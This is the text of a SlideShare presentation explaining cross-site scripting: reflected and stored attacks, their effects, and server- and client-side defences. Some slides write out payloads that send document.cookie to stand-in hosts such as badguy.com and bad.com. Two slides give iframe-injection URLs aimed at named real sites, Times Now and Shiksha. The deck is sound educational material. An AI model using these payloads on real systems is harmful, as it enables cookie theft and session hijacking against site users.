Cross site scripting (xss)

956 views

Published on

A power point presentation on the topic Cross Site Scripting.

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
956
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
53
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Cross site scripting (xss)

  1. 1. Cross-site scripting
  2. 2. CROSS-SITE SCRIPTING (XSS)  Cross-site scripting or XSS is a defined as a computer security vulnerability (weakness) found in web applications.  XSS allows for code injection by malicious web users into Internet pages viewed by other users.  In an XSS attack, the attacker gains the ability to see private user IDs, passwords, credit card information and other personal identification. 2/18/2014 2
  3. 3. XSS (-ve) effects stealing other user’s cookies  stealing their private information  performing actions on behalf of other users  redirecting to other websites  Showing ads in hidden IFRAMES and popups  2/18/2014 3
  4. 4. Cross Site Scripting Types Two known types:  Reflected (Non-Persistent) • Link in other website or email  2/18/2014 Stored (Persistent) • Forum, bulletin board, feedback form 4
  5. 5. Reflected (Non-persistent)… Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an email message, or on some other web site 2/18/2014 5
  6. 6. Reflected (Non-Persistent) 1 Send e-mail with <script> tags embedded in the link. http://mybank.com/ account.php?variable=”><script>document.lo cation=’http://www.badguy.com/cgi-bin/ cookie.cgi’”%20+document.cookie</script> Follows link and the script executes 2 www.badguy.com Cookie collector Malicious content dose not get stored in the server The server bounces the original input to the victim without modification 2/18/2014 6
  7. 7. EXAMPLE :- 2/18/2014 7
  8. 8. stored (persistent)…. In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users. see original post<script>window.location = "http://www.hackers.com?yid=";</script> 2/18/2014 8
  9. 9. Stored (Persistent) Public forum web site 1 Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script> 2 Downlaod malicious code Upload malicious scripting commands to the public forum Browse Attacker 3 Victim The server stores the malicious content The server serves the malicious content in its original form 2/18/2014 9
  10. 10. EXAMPLE : 2/18/2014 10
  11. 11. 2/18/2014 11
  12. 12. 2/18/2014 12
  13. 13. 2/18/2014 13
  14. 14. 2/18/2014 14
  15. 15. 2/18/2014 15
  16. 16. 2/18/2014 16
  17. 17. Who is affected by XSS?  XSS attack’s first target is the Client Client trusts server (Does not expect attack) Browser executes malicious script  But second target = Company running the Server Loss of public image (Blame) Loss of customer trust Loss of money 2/18/2014 17
  18. 18. CRIMES RLEATED TO XSS:XSS Vulnerability found on Facebook Subdomain( https://developers.facebook.com/ ) - Discovered by Mauritania_Attacker ( AnonGhost ) 2/18/2014 18
  19. 19. Time Now Tv & Shiksha Official Websites An 21 Years Old Information Security Expert, Narendra Bhati (R00t Sh3ll The Untracable) From Sheoganj Rajasthan. FEB- 2013 XSS Code for TIMES OF INDIA TV:http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakth esecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0 #sthash.Pm0cUkgL.dpuf 2/18/2014 19
  20. 20. XSS Code for Shiksha.com http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurit y.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duratio n=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_s earch&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggesto r_suggestion_shown=5#sthash.Pm0cUkgL.dpuf 2/18/2014 20
  21. 21.  Clint side •Cookie Security •Verify email •Always update  Server side •Input validation (Black listing VS White listing) •Encode all meta characters send to the client •keep track of user sessions •Web application firewall •Always test 2/18/2014 21
  22. 22. 2/18/2014 22

×